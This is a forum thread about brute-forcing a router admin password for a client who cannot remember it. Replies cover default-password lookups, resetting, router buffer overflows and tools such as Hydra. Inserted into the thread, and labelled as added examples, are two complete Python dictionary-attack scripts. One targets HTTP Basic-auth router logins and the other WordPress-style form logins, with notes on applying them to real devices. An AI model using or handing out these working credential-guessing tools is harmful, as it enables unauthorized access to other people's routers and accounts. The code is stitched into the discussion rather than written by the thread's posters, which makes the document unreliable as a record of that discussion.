Brute Force A Router


joeypesci

Is it possible to do a dictionary attack on a router to get the admin password? Haven't got the details of the router yet, but a client has had a stroke so can't remember the login details. They don't want to reset the router, and I just wondered if there was a way of brute forcing the password?

Before anyone comments: all above board and genuine.


> Is it possible to do a dictionary attack on a router to get the admin password? Haven't got the details of the router yet, but a client has had a stroke so can't remember the login details. They don't want to reset the router, and I just wondered if there was a way of brute forcing the password?
>
> Before anyone comments: all above board and genuine.

It's most definitely possible on a consumer router, since they usually don't have any mechanism to ban you after too many attempts. Nearly every consumer router only lets you change the password while keeping the same default user name from manufacturing (which is usually admin or root), so if you look up the default user name (if it even takes one, as some only require a single password entered with no user name), then it shouldn't be too hard to brute force it, just time consuming. If anything, it's a waste of time to try brute forcing if you can just reset it. If anything, see if he even changed the default password and look up the model first: http://www.routerpasswords.com/

If it is a consumer router, just reset the damn thing. Takes you 5 minutes to reset everything to what he needs it to be, and you can then change the password and be done with it. I can't see any reason not to reset it unless it were for a corporate network, by which you would have to take it offline to reset anyway. If it's on a corporate network, there isn't a reset button on high end Cisco equipment (or most other brands either) and you would need to put it in ROMmon mode via console/serial cable to reset the password anyway.

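As an added example (not code from this thread), the attack the post above describes: send one unauthenticated request to read the Basic-auth realm, which often names the vendor or model you then look up in a default-password table, and only then run a short default-username list against a wordlist. It runs against a constructed mock router on localhost so it works offline; the DEFAULT_USERS list, the wordlist and the admin:letmein credentials are assumptions.

```python
"""Dictionary attack on a router's HTTP Basic-auth admin login.

Added example, not code from this thread. The target is a constructed mock
router (stdlib http.server) on localhost; the default-username list and the
wordlist are assumptions for illustration.
"""
import base64
import itertools
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed mock: a consumer router that never locks out, admin:letmein.
MOCK_USER, MOCK_PASS = "admin", "letmein"
MOCK_REALM = "Broadband Router"


class MockRouter(BaseHTTPRequestHandler):
    """Answers 401 with a realm until the right Basic credentials arrive."""

    def do_GET(self):
        header = self.headers.get("Authorization", "")
        if header.startswith("Basic "):
            try:
                user, _, pw = base64.b64decode(header[6:]).decode().partition(":")
            except Exception:  # malformed header: treat as a failed attempt
                user, pw = "", ""
            if (user, pw) == (MOCK_USER, MOCK_PASS):
                self.send_response(200)
                self.end_headers()
                self.wfile.write(b"<title>Router Status</title>")
                return
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="%s"' % MOCK_REALM)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_router():
    srv = HTTPServer(("127.0.0.1", 0), MockRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


def probe_realm(url, timeout=3):
    """Unauthenticated GET: the Basic realm often names the vendor/model,
    which is what you look up in a default-password table first."""
    try:
        urlopen(Request(url), timeout=timeout)
    except HTTPError as e:
        if e.code == 401:
            hdr = e.headers.get("WWW-Authenticate", "")
            m = re.search(r'realm="([^"]*)"', hdr)
            return m.group(1) if m else hdr
        raise
    return None  # no auth challenge at all


def try_basic(url, user, pw, timeout=3):
    """One attempt: True on 200, False on 401, raise on anything else."""
    token = base64.b64encode(("%s:%s" % (user, pw)).encode()).decode()
    req = Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except HTTPError as e:
        if e.code == 401:
            return False
        raise  # a 403/429 here may be a lockout: stop rather than mask it


def dictionary_attack(url, usernames, wordlist):
    """Return the first (user, pw) the router accepts, or None."""
    for user, pw in itertools.product(usernames, wordlist):
        if try_basic(url, user, pw):
            return user, pw
    return None


# Assumed vendor defaults ("" covers password-only logins) and a constructed wordlist.
DEFAULT_USERS = ["admin", "root", ""]
WORDLIST = ["", "admin", "password", "1234", "letmein", "changeme"]

if __name__ == "__main__":
    srv, url = start_mock_router()
    print("realm:", probe_realm(url))
    print("found:", dictionary_attack(url, DEFAULT_USERS, WORDLIST))
    srv.shutdown()
```

Against a real box the realm check is the cheap step: if it identifies the model and the default credentials still work, no wordlist is needed. The attempt function deliberately re-raises anything other than 401 so that a device which does throttle or lock out is noticed instead of being reported as "not found".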

It's what the client wants. No idea why, but they don't want to reset it. Might be the login details for the ISP maybe? I used to be with BT and luckily wrote mine down years ago, then reset the router and had to hunt round for the ISP login details :) I know they could call the ISP, I guess. I don't know.

Anyway, thanks for the suggestions.


Depending on the version of the router, some have buffer overflows that give you root access, then you can just use passwd. I know the BT Home Hub white box had one.


Hydra is quite good for HTTP brute forcing. Used it many times for pen-testing my network.

Now on a side note, make sure you have a very long dictionary file.


It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P.

What I do with clients that always call me is set up remote admin, set up DynDNS in the router to auto-update so I always have the IP, and away I go. They never need to know the password.

I also write down the admin password and WiFi access passkey/phrase on a piece of paper and tape it to the top/bottom of the router, just so if I forget, they can tell me, and if they forget (typically the WiFi access passkey/phrase) they can just look at the paper taped to the router.


> It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P.
>
> What I do with clients that always call me is set up remote admin, set up DynDNS in the router to auto-update so I always have the IP, and away I go. They never need to know the password.
>
> I also write down the admin password and WiFi access passkey/phrase on a piece of paper and tape it to the top/bottom of the router, just so if I forget, they can tell me, and if they forget (typically the WiFi access passkey/phrase) they can just look at the paper taped to the router.

Doh! I can't tell you how many passwords I've found written on a sticky note placed on the bottom of the keyboard.


> Doh! I can't tell you how many passwords I've found written on a sticky note placed on the bottom of the keyboard.

I work for an IT company that provides on-site support for police and all the other gov agencies. Anyway, I've seen worse: they write all their passwords on a sticky note and place them on the monitor itself.

Ohh dude, they must be really secure, no one will ever know what their password is. (Sarcasm)


> Doh! I can't tell you how many passwords I've found written on a sticky note placed on the bottom of the keyboard.

That may be true, but I'm assuming this is a home user, not a business.

And if a home user, or anyone for that matter, has physical access to the router, why not have the password there? They could just as easily take the damn router...


In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access, then they can quite often do a lot more damage than steal the password.

Given the choice of a strong written-down password or a weak one, I'd go for the strong one, as there are many more remote attackers than local ones, so better to defend against the masses than the minority.


True, and like I said, I do that for the home computer illiterate. So if they don't remember the password, either I will or I can look at the paper on the router itself to not have to push the reset button.

That would be MOST helpful with dd-wrt flashed routers considering the reset button does not clear passwords.


> In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access, then they can quite often do a lot more damage than steal the password.
>
> Given the choice of a strong written-down password or a weak one, I'd go for the strong one, as there are many more remote attackers than local ones, so better to defend against the masses than the minority.

The problem I have with written passwords lying about, and this is from where I used to work, is that vendors and outside techs who enter the building can plainly see passwords written on sticky notes attached to monitors as they pass by. Our Xerox techs would have to log on to the Sun stations attached to the printers (they had their own CE logins for maintenance), but those resided in the same rack as some of our other servers in the room we used for printing, which had passwords taped under the keyboards. Easily discoverable, and easily compromised by something as simple as a sticky note on the monitor or keyboard.

I know for a fact that there was a person who I used to work with who used someone else's stolen password to access the internet when they themselves were not allowed to access the internet. This password got shared with other people and was discovered when the employee left the company: their password was still in use before there had been time to remove it. All because they stole the one other person's password. So the attacker isn't always someone from the outside; it could be an internal employee using another employee's credentials, and unless they get caught (which they did) you wouldn't be the wiser. In the case of the employee who stole the password, it not only gave them access to the internet proxy, but also to the user's Novell login and shares on the network tree, which if abused could have had disastrous results on the internal corporate network.


Shameless plug, RSYaba: http://www.digininja.org/projects/rsyaba.php

But I agree with Mr-P, unless you are really interested in playing with attack tools then just hit the reset button and reconfigure it.

I tried RSYaba on my site, and it worked a charm on my WordPress login. Granted, I provided the username and password to use, but it worked flawlessly once I figured out all the switches to add for the password field and username field, cookies, etc.

Excellent tool and very easy to use. I see you have it set for HTTP, HTTPS, MySQL and SSH. How hard would it be to modify it for something like, say, FTP, RDP, VNC, etc.? Would these require additional gems alone, or would you need to also write something to speak to these other protocols on top of the gems for them?

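As an added example (not code from this thread, from Hydra or from RSYaba), the form-login attack that the Hydra post and the RSYaba post above describe: a username field, a password field, a cookie jar, and success detected by the absence of a failure string in the response (the same check Hydra's http-post-form module makes with an F= fail condition). It runs against a constructed mock of a WordPress-style wp-login.php on localhost; the field names, the failure string, the wordlist and the admin:letmein credentials are assumptions. The use_cookies=False run shows why the cookie switch matters: the form sets a test cookie on GET and rejects any POST that does not send it back, so a brute forcer that ignores cookies silently finds nothing.

```python
"""Dictionary attack on a form-based (WordPress-style) login, with cookies.

Added example, not code from this thread or from RSYaba/Hydra. The target is a
constructed mock of wp-login.php (stdlib http.server) on localhost; the field
names, the failure string and the wordlist are assumptions for illustration.
"""
import itertools
import threading
from http.cookiejar import CookieJar
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, urlencode
from urllib.request import HTTPCookieProcessor, build_opener

LOGIN_PATH = "/wp-login.php"
MOCK_USER, MOCK_PASS = "admin", "letmein"  # constructed target credentials
TEST_COOKIE = "wordpress_test_cookie"


class MockLogin(BaseHTTPRequestHandler):
    """GET sets a test cookie; POST refuses logins that don't send it back."""

    def _page(self, body):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self.send_response(200)
        self.send_header("Set-Cookie", TEST_COOKIE + "=WP+Cookie+check; path=/")
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b'<form method="post"><input name="log"><input name="pwd"></form>')

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = dict(parse_qsl(self.rfile.read(length).decode()))
        if TEST_COOKIE not in self.headers.get("Cookie", ""):
            self._page(b"<strong>ERROR</strong>: Cookies are blocked or not supported.")
        elif (fields.get("log"), fields.get("pwd")) == (MOCK_USER, MOCK_PASS):
            self._page(b"<title>Dashboard</title>")
        else:
            self._page(b"<strong>ERROR</strong>: The password you entered is incorrect.")

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_login():
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def form_attack(base_url, usernames, wordlist, user_field="log", pass_field="pwd",
                failure_marker=b"ERROR", use_cookies=True):
    """Return the first (user, pw) whose response lacks the failure marker, else None.

    Success is detected by the *absence* of the failure string. With
    use_cookies=False the cookie received from the GET is never sent back, so
    every attempt is rejected and the attack finds nothing.
    """
    opener = build_opener(HTTPCookieProcessor(CookieJar())) if use_cookies else build_opener()
    opener.open(base_url + LOGIN_PATH, timeout=3).read()  # fetch the form once: receives the cookie
    for user, pw in itertools.product(usernames, wordlist):
        body = urlencode({user_field: user, pass_field: pw}).encode()
        with opener.open(base_url + LOGIN_PATH, data=body, timeout=3) as resp:
            page = resp.read()
        if failure_marker not in page:
            return user, pw
    return None


USERS = ["admin"]  # assumed
WORDLIST = ["password", "admin123", "letmein", "qwerty"]  # constructed

if __name__ == "__main__":
    srv, url = start_mock_login()
    print("without cookies:", form_attack(url, USERS, WORDLIST, use_cookies=False))
    print("with cookies:   ", form_attack(url, USERS, WORDLIST))
    srv.shutdown()
```

The failure-string check is the fragile part in practice: pick a marker that appears only on a rejected login, and confirm by hand that a deliberately wrong password really does produce it with cookies enabled, otherwise a cookie or CSRF problem reads as "password not in wordlist".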
